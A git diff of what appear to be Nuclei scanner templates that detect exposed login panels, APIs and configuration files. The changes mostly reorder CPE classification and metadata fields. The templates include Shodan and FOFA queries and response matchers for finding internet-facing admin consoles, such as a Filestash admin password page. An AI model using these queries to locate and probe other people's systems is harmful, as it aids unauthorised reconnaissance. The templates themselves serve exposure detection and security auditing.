490a0046304402205a8d693dc627b35099e8f8a938545e8e5aa981966322354b7aa9dae20a390c5d022023abab98e64708d72e49a00998f63710354c6dee059d402f6c5d78cb49771137:922c64590222798bb761d5b6d8e72950 + +# digest: 490a0046304402205a8d693dc627b35099e8f8a938545e8e5aa981966322354b7aa9dae20a390c5d022023abab98e64708d72e49a00998f63710354c6dee059d402f6c5d78cb49771137:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/scriptcase/scriptcase-prod-login.yaml b/http/exposed-panels/scriptcase/scriptcase-prod-login.yaml index 879273450e..5b528a0dcd 100644 --- a/http/exposed-panels/scriptcase/scriptcase-prod-login.yaml +++ b/http/exposed-panels/scriptcase/scriptcase-prod-login.yaml @@ -7,16 +7,16 @@ info: reference: - https://www.scriptcase.com.br - https://www.scriptcase.net + classification: + cpe: cpe:2.3:a:scriptcase:scriptcase:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 - shodan-query: title:"ScriptCase" - product: scriptcase vendor: scriptcase + product: scriptcase + shodan-query: title:"ScriptCase" tags: panel,scriptcase - classification: - cpe: cpe:2.3:a:scriptcase:scriptcase:*:*:*:*:*:*:*:* http: - method: GET path: @@ -45,4 +45,5 @@ http: group: 2 regex: - '(Versão|Version|Versão)\b.*\s(\d.*\d)' -# digest: 4a0a00473045022100a1f63ba4755f71bcfa7a5e4971361942694134f5fbf88f5ab9849e3b0a0f636902202b6055d7de79b5904703e3988e4e2c45dc54156e70e94ef605b9ad4f36407636:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a00473045022100a1f63ba4755f71bcfa7a5e4971361942694134f5fbf88f5ab9849e3b0a0f636902202b6055d7de79b5904703e3988e4e2c45dc54156e70e94ef605b9ad4f36407636:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/softether-vpn-panel.yaml b/http/exposed-panels/softether-vpn-panel.yaml index 641f4fc880..bf86cad1f1 100644 --- a/http/exposed-panels/softether-vpn-panel.yaml +++ b/http/exposed-panels/softether-vpn-panel.yaml @@ -6,16 +6,16 @@ info: severity: info description: | SoftEther VPN panel was detected. + classification: + cpe: cpe:2.3:a:softether:vpn:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: http.title:"SoftEther VPN Server" - product: vpn vendor: softether + product: vpn + shodan-query: http.title:"SoftEther VPN Server" tags: panel,vpn,softether - classification: - cpe: cpe:2.3:a:softether:vpn:*:*:*:*:*:*:*:* http: - method: GET path: @@ -31,4 +31,5 @@ http: - type: status status: - 202 -# digest: 490a0046304402200a36a6e1faa606ce97fa5812df11437d36096fd07363f4e2e9f98edf14d1ae4402207cdab6009066338ccc5cfa9a33d8c9bbe38f36c3aac7c07d6982a69b95ebbf6a:922c64590222798bb761d5b6d8e72950 + +# digest: 490a0046304402200a36a6e1faa606ce97fa5812df11437d36096fd07363f4e2e9f98edf14d1ae4402207cdab6009066338ccc5cfa9a33d8c9bbe38f36c3aac7c07d6982a69b95ebbf6a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/speedtest-panel.yaml b/http/exposed-panels/speedtest-panel.yaml index 574b0b4df3..25ab795545 100644 --- a/http/exposed-panels/speedtest-panel.yaml +++ b/http/exposed-panels/speedtest-panel.yaml @@ -9,16 +9,16 @@ info: reference: - https://github.com/alexjustesen/speedtest-tracker - https://docs.speedtest-tracker.dev/ + classification: + cpe: cpe:2.3:a:speed_test_project:speed_test:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: title:"Speedtest Tracker" - product: speed_test vendor: speed_test_project + product: speed_test + shodan-query: title:"Speedtest Tracker" tags: speedtest,tracker,panel,login - classification: - cpe: cpe:2.3:a:speed_test_project:speed_test:*:*:*:*:*:*:*:* http: - method: GET path: @@ -33,4 +33,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022012154c7388107665fc92c1493e926400bfb5b50e5a531817733d3afe1126b40d0221009f67a14c9eb6274d0f124a06338895f40b39032907a4e367386ea223bdb84437:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a00473045022012154c7388107665fc92c1493e926400bfb5b50e5a531817733d3afe1126b40d0221009f67a14c9eb6274d0f124a06338895f40b39032907a4e367386ea223bdb84437:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/suprema-biostar-panel.yaml b/http/exposed-panels/suprema-biostar-panel.yaml index b5c75905dc..be0eb973a6 100644 --- a/http/exposed-panels/suprema-biostar-panel.yaml +++ b/http/exposed-panels/suprema-biostar-panel.yaml @@ -4,16 +4,16 @@ info: name: Suprema BioStar 2 Panel - Detect author: ritikchaddha severity: info + classification: + cpe: cpe:2.3:a:supremainc:biostar_2:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: title:"Biostar" - product: biostar_2 vendor: supremainc + product: biostar_2 + shodan-query: title:"Biostar" tags: panel,login,biostar,detect - classification: - cpe: cpe:2.3:a:supremainc:biostar_2:*:*:*:*:*:*:*:* http: - method: GET path: @@ -29,4 +29,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022027e0261bae05a635e278ac51c0f4d96060518d672e582784f74eb3a6872d1469022100eb95ec2877b0c5f60b46250289b597e1a8384f84662d27eae567d40c3d3874a2:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a00473045022027e0261bae05a635e278ac51c0f4d96060518d672e582784f74eb3a6872d1469022100eb95ec2877b0c5f60b46250289b597e1a8384f84662d27eae567d40c3d3874a2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/tibco-spotfire-panel.yaml b/http/exposed-panels/tibco-spotfire-panel.yaml index f562167335..b7916e1003 100644 --- a/http/exposed-panels/tibco-spotfire-panel.yaml +++ b/http/exposed-panels/tibco-spotfire-panel.yaml @@ -8,6 +8,8 @@ info: TIBCO Spotfire login panel was detected. reference: - https://www.tibco.com/products/tibco-spotfire + classification: + cpe: cpe:2.3:a:tibco:spotfire_server:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 @@ -16,8 +18,6 @@ info: vendor: tibco tags: panel,tibco,login,detect - classification: - cpe: cpe:2.3:a:tibco:spotfire_server:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/exposed-panels/tigase-xmpp-server.yaml b/http/exposed-panels/tigase-xmpp-server.yaml index da795f1812..9dbcb106c5 100644 --- a/http/exposed-panels/tigase-xmpp-server.yaml +++ b/http/exposed-panels/tigase-xmpp-server.yaml @@ -6,16 +6,16 @@ info: severity: info reference: - https://www.facebook.com/photo/?fbid=617926933711163&set=a.467014098802448 + classification: + cpe: cpe:2.3:a:tigase:tigase:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: title:"Tigase XMPP Server" - product: tigase vendor: tigase + product: tigase + shodan-query: title:"Tigase XMPP Server" tags: tigase,xmpp,server,panel,exposure - classification: - cpe: cpe:2.3:a:tigase:tigase:*:*:*:*:*:*:*:* http: - method: GET path: @@ -31,4 +31,5 @@ http: - type: status status: - 200 -# digest: 490a0046304402202f5f0d783373878478c3b0613b9cfd77ae9102cfb810640e7a102c2d5e13eac1022028c937d9288d5833676178246e7310ace75c441823f88e29ded7854c3b9e8488:922c64590222798bb761d5b6d8e72950 + +# digest: 490a0046304402202f5f0d783373878478c3b0613b9cfd77ae9102cfb810640e7a102c2d5e13eac1022028c937d9288d5833676178246e7310ace75c441823f88e29ded7854c3b9e8488:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/tiny-rss-panel.yaml b/http/exposed-panels/tiny-rss-panel.yaml index 3e7df75bae..df639ddbc0 100644 --- a/http/exposed-panels/tiny-rss-panel.yaml +++ b/http/exposed-panels/tiny-rss-panel.yaml @@ -8,16 +8,16 @@ info: Tiny Tiny RSS is a free RSS feed reader reference: - https://tt-rss.org/ + classification: + cpe: cpe:2.3:a:tt-rss:tiny_tiny_rss:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: http.favicon.hash:-418614327 - product: tiny_tiny_rss vendor: tt-rss + product: tiny_tiny_rss + shodan-query: http.favicon.hash:-418614327 tags: panel,tiny-rss,login,detect - classification: - cpe: cpe:2.3:a:tt-rss:tiny_tiny_rss:*:*:*:*:*:*:*:* http: - method: GET path: @@ -29,4 +29,5 @@ http: - 'status_code==200' - 'contains_any(body, "Tiny Tiny RSS", "ttrss_login", "ttrss_utility")' condition: and -# digest: 490a004630440220245d0c3141ee1457aca5389046553a2b3d473e83c038ea05269dfbec590f8b2f022057be7b754f43f0dc143e45929e101b3433b1233176e327568411aae59518d163:922c64590222798bb761d5b6d8e72950 + +# digest: 490a004630440220245d0c3141ee1457aca5389046553a2b3d473e83c038ea05269dfbec590f8b2f022057be7b754f43f0dc143e45929e101b3433b1233176e327568411aae59518d163:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/uipath-orchestrator-panel.yaml b/http/exposed-panels/uipath-orchestrator-panel.yaml index a680b2165a..f3236c8959 100644 --- a/http/exposed-panels/uipath-orchestrator-panel.yaml +++ b/http/exposed-panels/uipath-orchestrator-panel.yaml @@ -8,16 +8,16 @@ info: UiPath Orchestrator login panel was detected. reference: - https://www.uipath.com/ + classification: + cpe: cpe:2.3:a:uipath:orchestrator:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: http.title:"UiPath Orchestrator" - product: orchestrator vendor: uipath + product: orchestrator + shodan-query: http.title:"UiPath Orchestrator" tags: panel,uipath,login,detect - classification: - cpe: cpe:2.3:a:uipath:orchestrator:*:*:*:*:*:*:*:* http: - method: GET path: @@ -36,4 +36,5 @@ http: group: 1 regex: - '\?(?:version|v)=([0-9.]+)' -# digest: 4b0a00483046022100b2ea407476958b2d9a6c2496dc5fe79140b611289c470696c516a44887aab487022100db30208178a084a88c0d269d8c40f22d7f7f7bb0a96665e429a0542f06fc8738:922c64590222798bb761d5b6d8e72950 + +# digest: 4b0a00483046022100b2ea407476958b2d9a6c2496dc5fe79140b611289c470696c516a44887aab487022100db30208178a084a88c0d269d8c40f22d7f7f7bb0a96665e429a0542f06fc8738:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/unibox-panel.yaml b/http/exposed-panels/unibox-panel.yaml index c3bd70c4c6..469d0b4cfd 100644 --- a/http/exposed-panels/unibox-panel.yaml +++ b/http/exposed-panels/unibox-panel.yaml @@ -5,16 +5,16 @@ info: author: theamanrawat severity: info description: Unibox Administrator panel was detected. + classification: + cpe: cpe:2.3:h:indionetworks:unibox:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: http.favicon.hash:176427349 - product: unibox vendor: indionetworks + product: unibox + shodan-query: http.favicon.hash:176427349 tags: panel,unibox,login - classification: - cpe: cpe:2.3:h:indionetworks:unibox:*:*:*:*:*:*:*:* http: - method: GET path: @@ -40,4 +40,5 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220416d0b591a4f31b4b84203f05617ce7889d4af1132a2daabc23cd308944b12fd022100b0693d29d862994d978b591542e82f4dad1e33d020bb7c234b183913bd87d795:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a004730450220416d0b591a4f31b4b84203f05617ce7889d4af1132a2daabc23cd308944b12fd022100b0693d29d862994d978b591542e82f4dad1e33d020bb7c234b183913bd87d795:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/uptime-kuma-panel.yaml b/http/exposed-panels/uptime-kuma-panel.yaml index b0d21f18db..6f0dc212af 100644 --- a/http/exposed-panels/uptime-kuma-panel.yaml +++ b/http/exposed-panels/uptime-kuma-panel.yaml @@ -9,16 +9,16 @@ info: reference: - https://github.com/louislam/uptime-kuma - https://github.com/louislam/uptime-kuma/wiki + classification: + cpe: cpe:2.3:a:uptime.kuma:uptime_kuma:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: title:"Uptime Kuma" - product: uptime_kuma vendor: uptime.kuma + product: uptime_kuma + shodan-query: title:"Uptime Kuma" tags: uptime,kuma,panel,login,detect - classification: - cpe: cpe:2.3:a:uptime.kuma:uptime_kuma:*:*:*:*:*:*:*:* http: - method: GET path: @@ -33,4 +33,5 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220313780b1f320d07ea8fa501dc89ba05a76ef6f452ec7c38945a08de5f6c2ee420221008a66fa01c2573c674287635fa610df877d2fce286b2492dc4325410719e2feac:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a004730450220313780b1f320d07ea8fa501dc89ba05a76ef6f452ec7c38945a08de5f6c2ee420221008a66fa01c2573c674287635fa610df877d2fce286b2492dc4325410719e2feac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/urbackup-panel.yaml b/http/exposed-panels/urbackup-panel.yaml index 9d8a3ad421..abc2aadb9f 100644 --- a/http/exposed-panels/urbackup-panel.yaml +++ b/http/exposed-panels/urbackup-panel.yaml @@ -4,16 +4,16 @@ info: name: UrBackup Panel - Detect author: DhiyaneshDk severity: info + classification: + cpe: cpe:2.3:a:urbackup:urbackup:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: html:"UrBackup - Keeps your data safe" - product: urbackup vendor: urbackup + product: urbackup + shodan-query: html:"UrBackup - Keeps your data safe" tags: urbackup,panel,login,detect - classification: - cpe: cpe:2.3:a:urbackup:urbackup:*:*:*:*:*:*:*:* http: - method: GET path: @@ -29,4 +29,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100e2438fa822bd78e1a3fb2db2967d18e37acc757dffb1d901158aad1ba59680be0220762d7f76021679cdeb4190c83c58634cc7ef989462735e610af58664e0bad1f6:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a00473045022100e2438fa822bd78e1a3fb2db2967d18e37acc757dffb1d901158aad1ba59680be0220762d7f76021679cdeb4190c83c58634cc7ef989462735e610af58664e0bad1f6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/webtransfer-client-panel.yaml b/http/exposed-panels/webtransfer-client-panel.yaml index f3f558b4f5..7c929cbf22 100644 --- a/http/exposed-panels/webtransfer-client-panel.yaml +++ b/http/exposed-panels/webtransfer-client-panel.yaml @@ -7,16 +7,16 @@ info: description: Progress Web Transfer Client login panel was detected. reference: - https://www.progress.com/ftp-server/web-transfer + classification: + cpe: cpe:2.3:a:progress:moveit_transfer:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: http.title:"Web Transfer Client" - product: moveit_transfer vendor: progress + product: moveit_transfer + shodan-query: http.title:"Web Transfer Client" tags: panel,webtransferclient,login,detect - classification: - cpe: cpe:2.3:a:progress:moveit_transfer:*:*:*:*:*:*:*:* http: - method: GET path: @@ -28,4 +28,5 @@ http: - 'status_code == 200' - 'contains(body, "<title>Web Transfer Client")' condition: and -# digest: 490a0046304402203f970565705761cadb9a73e16c172152e3d5df14dea54d907dc07a22563942dc022043f589d0a0b055c65bba328a1cdaecff4b7bbf11cd6eda05974f81a7b73ce2d6:922c64590222798bb761d5b6d8e72950 + +# digest: 490a0046304402203f970565705761cadb9a73e16c172152e3d5df14dea54d907dc07a22563942dc022043f589d0a0b055c65bba328a1cdaecff4b7bbf11cd6eda05974f81a7b73ce2d6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/whatsup-gold-panel.yaml b/http/exposed-panels/whatsup-gold-panel.yaml index ef441bf024..1d688ff59a 100644 --- a/http/exposed-panels/whatsup-gold-panel.yaml +++ b/http/exposed-panels/whatsup-gold-panel.yaml @@ -8,16 +8,16 @@ info: Whatsup Gold login panel was detected. reference: - https://www.whatsupgold.com/ + classification: + cpe: cpe:2.3:a:progress:whatsup_gold:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 - shodan-query: title:"WhatsUp Gold" http.favicon.hash:-2107233094 - product: whatsup_gold vendor: progress + product: whatsup_gold + shodan-query: title:"WhatsUp Gold" http.favicon.hash:-2107233094 tags: panel,whatsup-gold,detect - classification: - cpe: cpe:2.3:a:progress:whatsup_gold:*:*:*:*:*:*:*:* http: - method: GET path: @@ -26,8 +26,8 @@ http: host-redirects: true max-redirects: 2 - stop-at-first-match: true + matchers-condition: and matchers: - type: word @@ -38,4 +38,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100c67d4d7d5825640001925f3e039e7ae1afc956413d37374cc707593dff032a55022100e0f879d303c42e500a96ef5b3437d1b37bb53c49429315c4258dc289ce400844:922c64590222798bb761d5b6d8e72950 + +# digest: 4b0a00483046022100c67d4d7d5825640001925f3e039e7ae1afc956413d37374cc707593dff032a55022100e0f879d303c42e500a96ef5b3437d1b37bb53c49429315c4258dc289ce400844:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/yellowfin-panel.yaml b/http/exposed-panels/yellowfin-panel.yaml index 1e239958d4..7fb0f69425 100644 --- a/http/exposed-panels/yellowfin-panel.yaml +++ b/http/exposed-panels/yellowfin-panel.yaml @@ -4,16 +4,16 @@ info: name: Yellowfin Information Collaboration - Detect author: DhiyaneshDK severity: info + classification: + cpe: cpe:2.3:a:yellowfinbi:yellowfin:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: title:"Yellowfin Information Collaboration" - product: yellowfin vendor: yellowfinbi + product: yellowfin + shodan-query: title:"Yellowfin Information Collaboration" tags: yellowfin,panel,login - classification: - cpe: cpe:2.3:a:yellowfinbi:yellowfin:*:*:*:*:*:*:*:* http: - method: GET path: @@ -34,4 +34,5 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221008b84749226927040ea2317b28449b7650b61161446b7a6206974d7e231565a080220693d78f91cd7931bdca6021b28d5354825a1ed9bc834de857e6b585024d2de71:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a004730450221008b84749226927040ea2317b28449b7650b61161446b7a6206974d7e231565a080220693d78f91cd7931bdca6021b28d5354825a1ed9bc834de857e6b585024d2de71:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/zenml-dashboard-panel.yaml b/http/exposed-panels/zenml-dashboard-panel.yaml index 80af0f6b33..86be14319d 100644 --- a/http/exposed-panels/zenml-dashboard-panel.yaml +++ b/http/exposed-panels/zenml-dashboard-panel.yaml @@ -4,17 +4,17 @@ info: name: ZenML Dashboard Panel - Detect author: DhiyaneshDK severity: info + classification: + cpe: cpe:2.3:a:zenml:zenml:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 + vendor: zenml + product: zenml shodan-query: http.favicon.hash:-2028554187 fofa-query: body="ZenML" - product: zenml - vendor: zenml tags: zenml,panel,login - classification: - cpe: cpe:2.3:a:zenml:zenml:*:*:*:*:*:*:*:* http: - method: GET path: @@ -25,9 +25,10 @@ http: - type: word words: - "ZenML - Dashboard" - part: body + - type: status status: - 200 -# digest: 490a0046304402206853ce42c1640bc82065352996f49d24ae2d5b5a7fafea6e7bbb51d8c9d0a4f80220616607a03c8dbf6af9513b7ace21c20580991ded495eb9998ab30f7ebde65ef9:922c64590222798bb761d5b6d8e72950 + +# digest: 490a0046304402206853ce42c1640bc82065352996f49d24ae2d5b5a7fafea6e7bbb51d8c9d0a4f80220616607a03c8dbf6af9513b7ace21c20580991ded495eb9998ab30f7ebde65ef9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposures/apis/jeecg-boot-swagger.yaml b/http/exposures/apis/jeecg-boot-swagger.yaml index 16f509eaad..4dabe83f78 100644 --- a/http/exposures/apis/jeecg-boot-swagger.yaml +++ b/http/exposures/apis/jeecg-boot-swagger.yaml @@ -5,17 +5,17 @@ info: author: ritikchaddha severity: info description: Jeecg Swagger Bootstrap UI exposed. + classification: + cpe: cpe:2.3:a:jeecg:jeecg-boot:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 + vendor: jeecg + product: jeecg-boot shodan-query: title:"Jeecg-Boot" fofa-query: title="JeecgBoot 企业级低代码平台" - product: jeecg-boot - vendor: jeecg tags: jeecg,swagger,detect,exposure - classification: - cpe: cpe:2.3:a:jeecg:jeecg-boot:*:*:*:*:*:*:*:* http: - method: GET path: @@ -26,4 +26,5 @@ http: part: body words: - "<title>Swagger-Bootstrap-UI" -# digest: 4a0a004730450220399772c6fac159e018e26aec89d85d94a9df282c1213c027e08db8b7e2f0169a022100e5952c927f759d37af355d775a184c33c49feb8ac669322d647f24700fe5d4fa:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a004730450220399772c6fac159e018e26aec89d85d94a9df282c1213c027e08db8b7e2f0169a022100e5952c927f759d37af355d775a184c33c49feb8ac669322d647f24700fe5d4fa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposures/apis/seafile-api.yaml b/http/exposures/apis/seafile-api.yaml index 615aea7991..180c68d067 100644 --- a/http/exposures/apis/seafile-api.yaml +++ b/http/exposures/apis/seafile-api.yaml @@ -10,16 +10,16 @@ info: - https://download.seafile.com/published/web-api/home.md - https://manual.seafile.com/ - https://www.seafile.com/en/home/ + classification: + cpe: cpe:2.3:a:seafile:seafile:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: http.html:"seafile" - product: seafile vendor: seafile + product: seafile + shodan-query: http.html:"seafile" tags: exposure,api,detect - classification: - cpe: cpe:2.3:a:seafile:seafile:*:*:*:*:*:*:*:* http: - method: GET path: @@ -50,4 +50,4 @@ http: regex: - '"version":\s*"([0-9.]+)"' -# digest: 4a0a00473045022100c47c1ae5d724d7b5a58f902d8807a9c455951aea612d75bae34e5f0b5fbf0d5f022004cbf64a4224a7d86c861b15ee1983a7b9a0d5ea80efc59b92ff61adb2cc285d:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100c47c1ae5d724d7b5a58f902d8807a9c455951aea612d75bae34e5f0b5fbf0d5f022004cbf64a4224a7d86c861b15ee1983a7b9a0d5ea80efc59b92ff61adb2cc285d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposures/configs/codeception-config.yaml b/http/exposures/configs/codeception-config.yaml index 437ec7eb56..0217fc2326 100644 --- a/http/exposures/configs/codeception-config.yaml +++ b/http/exposures/configs/codeception-config.yaml @@ -5,6 +5,8 @@ info: author: DhiyaneshDk severity: low description: Codeception YAML configuration file was detected. + classification: + cpe: cpe:2.3:a:codeception:codeception:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 @@ -13,8 +15,6 @@ info: vendor: codeception tags: exposure,devops,codeception,config,cicd - classification: - cpe: cpe:2.3:a:codeception:codeception:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/exposures/configs/filestash-admin-config.yaml b/http/exposures/configs/filestash-admin-config.yaml index f38d22772f..7fb95518e6 100644 --- a/http/exposures/configs/filestash-admin-config.yaml +++ b/http/exposures/configs/filestash-admin-config.yaml @@ -6,16 +6,16 @@ info: severity: high description: | Filestash is susceptible to the Admin Password Configuration page exposure due to misconfiguration. + classification: + cpe: cpe:2.3:a:filestash:filestash:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: html:"Admin Console" - product: filestash vendor: filestash + product: filestash + shodan-query: html:"Admin Console" tags: exposure,filestash,config - classification: - cpe: cpe:2.3:a:filestash:filestash:*:*:*:*:*:*:*:* http: - method: GET path: @@ -33,4 +33,5 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221008d18436adf95aef37bf555bd240b9f8fe6990a1c637624d206fcc7733673f62f02210085a8db22dccb1df2f164afa6ec88a3dc3d31ca327e6981d85122220a8634bfd2:922c64590222798bb761d5b6d8e72950 + +# digest: 4b0a004830460221008d18436adf95aef37bf555bd240b9f8fe6990a1c637624d206fcc7733673f62f02210085a8db22dccb1df2f164afa6ec88a3dc3d31ca327e6981d85122220a8634bfd2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposures/configs/jkstatus-manager.yaml b/http/exposures/configs/jkstatus-manager.yaml index 8674ae3575..3f3a1f2f28 100644 --- a/http/exposures/configs/jkstatus-manager.yaml +++ b/http/exposures/configs/jkstatus-manager.yaml @@ -8,16 +8,16 @@ info: Exposed JKStatus manager which is a web-based tool that allows administrators to monitor and manage the connections between the Apache HTTP Server and the Tomcat application server. reference: - https://github.com/PortSwigger/j2ee-scan/blob/master/src/main/java/burp/j2ee/issues/impl/JKStatus.java + classification: + cpe: cpe:2.3:a:apache:tomcat:*:*:*:*:*:*:*:* metadata: verified: true max-request: 8 - shodan-query: html:"JK Status Manager" - product: tomcat vendor: apache + product: tomcat + shodan-query: html:"JK Status Manager" tags: config,jk,status,exposure - classification: - cpe: cpe:2.3:a:apache:tomcat:*:*:*:*:*:*:*:* http: - method: GET @@ -38,4 +38,5 @@ http: - type: word words: - "JK Status Manager" -# digest: 490a0046304402205bc0be4fe64354ab625e609d9b1de733811c19aee5c839064f3ee13fe5f1a9d702206e4a116fd9cd36ff0920b8589a6fdbb374ed0d8537cfeaf33faf2e63d21f1d3a:922c64590222798bb761d5b6d8e72950 + +# digest: 490a0046304402205bc0be4fe64354ab625e609d9b1de733811c19aee5c839064f3ee13fe5f1a9d702206e4a116fd9cd36ff0920b8589a6fdbb374ed0d8537cfeaf33faf2e63d21f1d3a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposures/configs/phpsys-info.yaml b/http/exposures/configs/phpsys-info.yaml index 6df3d9fa7f..f6e58be5d1 100644 --- a/http/exposures/configs/phpsys-info.yaml +++ b/http/exposures/configs/phpsys-info.yaml @@ -7,16 +7,16 @@ info: description: | phpSysInfo: a customizable PHP script that displays information about your system nicely reference: https://phpsysinfo.github.io/phpsysinfo/ + classification: + cpe: cpe:2.3:a:phpsysinfo:phpsysinfo:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: html:"phpSysInfo" - product: phpsysinfo vendor: phpsysinfo + product: phpsysinfo + shodan-query: html:"phpSysInfo" tags: config,exposure,phpsysinfo - classification: - cpe: cpe:2.3:a:phpsysinfo:phpsysinfo:*:*:*:*:*:*:*:* http: - method: GET path: @@ -34,4 +34,4 @@ http: status: - 200 -# digest: 4a0a00473045022007eae5c482391a502e1165c940ad07ee2b0c4d9d00ef45dbb05bd2c905480dc7022100e054e5cf9b85bd1a6b75e9e2a959d8176c1a04831e8788c670bdc539ed361df5:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022007eae5c482391a502e1165c940ad07ee2b0c4d9d00ef45dbb05bd2c905480dc7022100e054e5cf9b85bd1a6b75e9e2a959d8176c1a04831e8788c670bdc539ed361df5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposures/configs/rakefile-disclosure.yaml b/http/exposures/configs/rakefile-disclosure.yaml index c14f566d39..2907453286 100644 --- a/http/exposures/configs/rakefile-disclosure.yaml +++ b/http/exposures/configs/rakefile-disclosure.yaml @@ -8,16 +8,16 @@ info: Rakefile configuration file was detected. reference: - https://ruby.github.io/rake/doc/rakefile_rdoc.html + classification: + cpe: cpe:2.3:a:ruby-lang:ruby:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: html:"Rakefile" - product: ruby vendor: ruby-lang + product: ruby + shodan-query: html:"Rakefile" tags: devops,exposure,rakefile,config,ruby,rails - classification: - cpe: cpe:2.3:a:ruby-lang:ruby:*:*:*:*:*:*:*:* http: - method: GET path: @@ -41,4 +41,4 @@ http: - 'task :' condition: and -# digest: 490a00463044022006d1348a9ef873df72d1fb2c0826d6d4ab59cae528ffd3b606b12acb7cd446d402206735a2059c2232203e2902431481d570b764b24f0dac6abcabd0507111b0c262:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022006d1348a9ef873df72d1fb2c0826d6d4ab59cae528ffd3b606b12acb7cd446d402206735a2059c2232203e2902431481d570b764b24f0dac6abcabd0507111b0c262:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposures/configs/yii-debugger.yaml b/http/exposures/configs/yii-debugger.yaml index 11aadded66..7ae8e65aba 100644 --- a/http/exposures/configs/yii-debugger.yaml +++ b/http/exposures/configs/yii-debugger.yaml @@ -7,16 +7,16 @@ info: description: Detects potential exposure to Yii Debugger information. reference: - https://yii2-framework.readthedocs.io/en/stable/guide/tool-debugger/ + classification: + cpe: cpe:2.3:a:yii_software:yii:*:*:*:*:*:*:*:* metadata: verified: true max-request: 6 - shodan-query: title:"Yii Debugger" - product: yii vendor: yii_software + product: yii + shodan-query: title:"Yii Debugger" tags: yii,debug,exposure - classification: - cpe: cpe:2.3:a:yii_software:yii:*:*:*:*:*:*:*:* http: - method: GET path: @@ -47,4 +47,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022045e18422d1a7a5c2fba88c671860be9cdaaa1d7f51b85ca7d992891fc347cdaf02210081e5c948bfe391b0bcdbe2f935dc2c387bce5f6b0691962f3782af0c72621d2b:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a00473045022045e18422d1a7a5c2fba88c671860be9cdaaa1d7f51b85ca7d992891fc347cdaf02210081e5c948bfe391b0bcdbe2f935dc2c387bce5f6b0691962f3782af0c72621d2b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposures/files/angular-json.yaml b/http/exposures/files/angular-json.yaml index c1c0bde95d..78bd526d9f 100644 --- a/http/exposures/files/angular-json.yaml +++ b/http/exposures/files/angular-json.yaml @@ -4,18 +4,18 @@ info: name: Angular JSON File Exposure author: DhiyaneshDk severity: info + classification: + cpe: cpe:2.3:a:angularjs:angular:*:*:*:*:node.js:*:*:* metadata: verified: true max-request: 4 + vendor: angularjs + product: angular shodan-query: - html:"angular.json" - html:"angular-cli.json" - 